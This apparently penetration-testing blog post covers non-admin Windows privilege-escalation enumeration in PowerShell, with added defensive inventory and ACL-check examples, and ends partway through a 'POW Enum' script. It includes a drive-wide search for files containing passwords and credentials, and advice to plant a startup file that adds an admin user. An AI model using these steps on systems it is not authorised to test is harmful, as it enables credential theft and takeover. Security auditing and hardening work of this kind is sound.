Enumerating information with pure Windows commands often requires administrator access. For example, it is normally not possible to enumerate which service listens on a specific port with netstat -b without being admin. To overcome this, you can separately fetch the listening-port information and the service information and then match the process ID of both. Then, by searching the output for "localport", it is possible to conclude which service is using the port. Knowing the service makes it much easier to tweak requests and connections on the specific port to match potential vulnerabilities.
The following line enumerates the listening port associated with each running service:
Get-WmiObject win32_service -filter "state='running'" | Select Name, ProcessID, PathName, Startname, @{Name="ListenPort";Expression={Get-NetTCPConnection -OwningProcess $_.ProcessID -State Listen -ErrorAction SilentlyContinue | select localport }} | format-list
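The one-liner above runs one Get-NetTCPConnection query per service and nests the port inside a "localport" object. The following is an added example, not code from the original post: it fetches each data source once, joins them on the process ID, and adds a Findings column a defender can work through (listeners bound to all interfaces, services running as SYSTEM, and the unquoted-path misconfiguration the post's script comments mention). It assumes Windows PowerShell 5.1 with the NetTCPIP module and, like the post, no administrator rights; the account list and the path heuristic are this example's own conventions.

```powershell
# Added example, not part of the original post: build a listener inventory by
# joining services, processes and listening sockets on process id.

function Get-ListenerFindings {
    param($Conn, $Service, [string[]]$PrivilegedAccounts)
    $findings = @()
    if (@('0.0.0.0', '::') -contains $Conn.LocalAddress) {
        $findings += 'binds all interfaces'
    }
    if ($Service) {
        if ($PrivilegedAccounts -contains $Service.StartName) {
            $findings += 'runs as SYSTEM'
        }
        # Heuristic (assumption of this example): an unquoted executable path
        # that contains a space is the classic unquoted-service-path defect.
        $exe = $Service.PathName -replace '\.exe.*$', '.exe'
        if ($exe -and $exe -notmatch '^"' -and $exe -match '\s') {
            $findings += 'unquoted service path with spaces'
        }
    }
    return $findings
}

function Get-ListenerInventory {
    # Constructed list of high-privilege service accounts.
    param([string[]]$PrivilegedAccounts = @('LocalSystem', 'NT AUTHORITY\SYSTEM'))

    # Index running services by process id. Keys are normalised to [int]
    # because Win32_Service.ProcessId (UInt32) and Get-Process.Id (Int32)
    # never compare equal as hashtable keys. Several services can share one
    # svchost.exe, so each key holds a list.
    $servicesByPid = @{}
    foreach ($svc in (Get-CimInstance Win32_Service -Filter "State='Running'")) {
        $key = [int]$svc.ProcessId
        if (-not $servicesByPid.ContainsKey($key)) { $servicesByPid[$key] = @() }
        $servicesByPid[$key] += $svc
    }

    $processNames = @{}
    foreach ($p in (Get-Process)) { $processNames[[int]$p.Id] = $p.ProcessName }

    foreach ($conn in (Get-NetTCPConnection -State Listen)) {
        $key = [int]$conn.OwningProcess
        $services = $servicesByPid[$key]
        # Listeners owned by a plain process (no service) are still reported.
        if (-not $services) { $services = @($null) }
        foreach ($svc in $services) {
            $findings = Get-ListenerFindings -Conn $conn -Service $svc -PrivilegedAccounts $PrivilegedAccounts
            $svcName = if ($svc) { $svc.Name } else { '' }
            $runsAs  = if ($svc) { $svc.StartName } else { '' }
            $binary  = if ($svc) { $svc.PathName } else { '' }
            [pscustomobject]@{
                LocalAddress = $conn.LocalAddress
                LocalPort    = $conn.LocalPort
                ProcessId    = $key
                Process      = $processNames[$key]
                Service      = $svcName
                RunsAs       = $runsAs
                BinaryPath   = $binary
                Findings     = ($findings -join '; ')
            }
        }
    }
}

# Usage: one row per listener (and per service sharing that process).
Get-ListenerInventory | Sort-Object LocalPort | Format-Table -AutoSize
```

The Findings column is the part worth keeping: a service that binds all interfaces, runs as LocalSystem and has an unquoted path is the row to fix first (quote the path, bind to localhost where possible, or run it under a dedicated account).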
Another good escalation point is the information that may be enumerated from the startup folder. For example, some files may run as administrator, and write access to such files could therefore provide an escalation option. Likewise, sometimes the file has been deleted from the server/workstation but is still in the list of programs to run during startup. In such a case, you can simply create the file (if you have write access to the location) and add a line to create a new admin user.
The following PowerShell command may be used to enumerate the startup folder:
Get-CimInstance Win32_StartupCommand | select name,command,location,user
Files that contain credentials may also be present on a system's drive. The following PowerShell command may be used to find files that contain credentials:
cd c:\; gci -r -File -ErrorAction SilentlyContinue -Exclude *.exe, *.dll, *.sys, *.hlp, *.cab, *.png, *.jpg, *.msi, *.zip, *.7z, *.bmp, *.gif | select-string -Pattern "password","admin","credentials","-P","net use","domain name here"
Information about which files and folders are writable can be very valuable. Executable files that are writable could provide a good escalation point if any scripts or other programs execute such files as a privileged user. Likewise, if for example one of the folders in the path variable is writable (viewed with the path or set command), you may be able to perform DLL hijacking. The following PowerShell code may be used to enumerate files and folders with write access for a specific group:
cd c:\
function Get-Paths {
    # Group to look for; the wildcard also matches "Authenticated Users".
    $group = "*Users*"
    $root_folder = $args[0]
    write-output "[*] Processing writable folders recursively in $root_folder"
    # Only directories are inspected (PSIsContainer); drop that check to include files.
    foreach ($item in (Get-ChildItem $root_folder -recurse -ErrorAction SilentlyContinue)) {
        if ($item.PSIsContainer) {
            # -ErrorAction Stop turns an access-denied error into one the catch block sees.
            try { $res = Get-Acl $item.FullName -ErrorAction Stop } catch { continue }
            foreach ($a in $res.access) {
                if ($a.IdentityReference -like $group) {
                    $rights = $a.FileSystemRights
                    # Modify and FullControl imply both write and execute but their
                    # string form contains neither "Write" nor "ReadAndExecute".
                    if ( (($rights -like "*Write*" -or $rights -like "*CreateFiles*") -and $rights -like "*ReadAndExecute*") -or $rights -like "*Modify*" -or $rights -like "*FullControl*" ) {
                        write-output "[+] $($item.FullName)"
                    }
                }
            }
        }
    }
}
# Usage: Get-Paths c:\
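The startup-command check and the writable-folder check above both come down to one question: can a principal every interactive user belongs to write to a location that privileged code later trusts? The following is an added example and not code from the original post; it covers both passages with a single ACL test and reports findings to remediate (tighten the ACL, remove the stale startup entry, or take the directory out of PATH). It assumes Windows PowerShell 5.1; the principal list, the rights mask and the startup command-line parsing are this example's own conventions, not Windows APIs.

```powershell
# Added example, not part of the original post: one ACL test applied to
# startup commands (missing or writable targets) and to PATH directories.

# Constructed list of principals every interactive user is a member of.
$LowPrivPrincipals = @(
    'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'Everyone', 'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow changing a file or dropping a file into a directory.
# Modify and FullControl are supersets of the others.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, Modify, FullControl'

function Test-LowPrivWrite {
    # Returns a string describing the first matching Allow rule, $false when
    # none matches, or $null when the ACL cannot be read. Deny rules are not
    # evaluated, so the check may over-report but never silently under-reports.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        if (([int]($rule.FileSystemRights -band $WriteRights)) -ne 0) {
            return "$($rule.IdentityReference.Value): $($rule.FileSystemRights)"
        }
    }
    return $false
}

function Get-CommandTarget {
    # Extracts the executable from a startup command line: a quoted path,
    # otherwise everything up to the first ".exe", otherwise the first token.
    param([string]$Command)
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*(\S.*?\.exe)') { return $Matches[1] }
    return ($Command -split '\s+')[0]
}

function Resolve-Target {
    # Expands %VAR% references and resolves bare names through PATH.
    param([string]$Target)
    $path = [Environment]::ExpandEnvironmentVariables($Target)
    if (-not [IO.Path]::IsPathRooted($path)) {
        $cmd = @(Get-Command $path -CommandType Application -ErrorAction SilentlyContinue)[0]
        if ($cmd) { $path = $cmd.Path }
    }
    return $path
}

function Get-StartupFindings {
    foreach ($entry in (Get-CimInstance Win32_StartupCommand)) {
        $target = Resolve-Target (Get-CommandTarget $entry.Command)
        if (Test-Path -LiteralPath $target) {
            $finding = 'target writable'
            $write = Test-LowPrivWrite $target
        } else {
            # Missing target: the risk is a directory someone else can create
            # the file in. Startup-folder shortcuts also land here and need a
            # manual look.
            $finding = 'target missing'
            $parent = Split-Path -Path $target -Parent
            $write = if ($parent) { Test-LowPrivWrite $parent } else { $null }
        }
        if ($finding -eq 'target missing' -or $write) {
            [pscustomobject]@{
                Name = $entry.Name; Location = $entry.Location
                Target = $target; Finding = $finding; LowPrivWrite = $write
            }
        }
    }
}

function Get-PathFindings {
    foreach ($dir in ($env:Path -split ';' | Where-Object { $_ })) {
        $write = Test-LowPrivWrite $dir
        if ($write) { [pscustomobject]@{ Directory = $dir; LowPrivWrite = $write } }
    }
}

Get-StartupFindings | Format-Table -AutoSize
Get-PathFindings    | Format-Table -AutoSize
```

A LowPrivWrite value of $null means the ACL could not be read from this account; treat those rows as unknown rather than clean and re-run the check with an administrative account.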
These and many other options are part of the "dirty script" below called POW Enum. This script is attached below. Before running the script you need to search and replace "h:\" with a drive/folder you can write to, preferably the home folder. You also should replace "(domain name here)" with the AD domain that you are hacking.
pow_enum.ps1 – script
#POW Enum - by Kenny Jansson, 2017
#The following PowerShell script enumerates information which may be used for privilege escalation. In addition, PowerUp should be run (you may have to invoke each function separately if execution is limited).
#Before running the script you need to search and replace "h:\" with a drive/folder you can write to, preferably the home folder. You also should replace "(domain name here)" with the AD domain that you are hacking.

# Get all connections
Get-NetTCPConnection > h:\connections.txt

# Get listening ports
Get-NetTCPConnection -State Listen > h:\listening_ports.txt

# Get version number of products (match any version against common vulnerabilities)
# Note: enumerating Win32_Product makes Windows Installer run a consistency check (and possibly a repair) on every installed MSI package, so it is slow and writes entries to the Application event log.
Get-WmiObject -Class Win32_Product | select Name, Vendor, Version, InstallLocation > h:\products.txt

# Get services (check for the version number of any service that is running as LocalSystem and if there are any known vulnerabilities; also check for unquoted paths or ~1 ~2 paths – if write access to the path you may pwn the service)
Get-WmiObject win32_service | select * > h:\services.txt

# PowerShell - get listening port for each process
Get-NetTCPConnection -State Listen | select @{Name="ProcessName";Expression={(Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName}}, LocalPort > h:\process_ports.txt

# PowerShell - get listening port for each service (attempt to browse or netcat to the port of each service – search the file for "localport")
Get-WmiObject win32_service -filter "state='running'" | Select Name, ProcessID, PathName, Startname, @{Name="ListenPort";Expression={Get-NetTCPConnection -OwningProcess $_.ProcessID -State Listen -ErrorAction SilentlyContinue | select localport }} | format-list > h:\ports_services.txt

# Get OS version
gwmi win32_operatingsystem | % caption > h:\os_version.txt

# Get hotfixes (check for vulnerabilities with windows-exploit-suggester.py)
get-hotfix > h:\hotfixes.txt

# Get scheduled tasks
get-scheduledtask > h:\sched_tasks.txt

# Get startup programs (maybe it's possible to replace the program to be started for all users, or if the program listed does not exist.. create it!)
Get-CimInstance Win32_StartupCommand | select name,command,location,user > h:\startup.txt

# Get unquoted service paths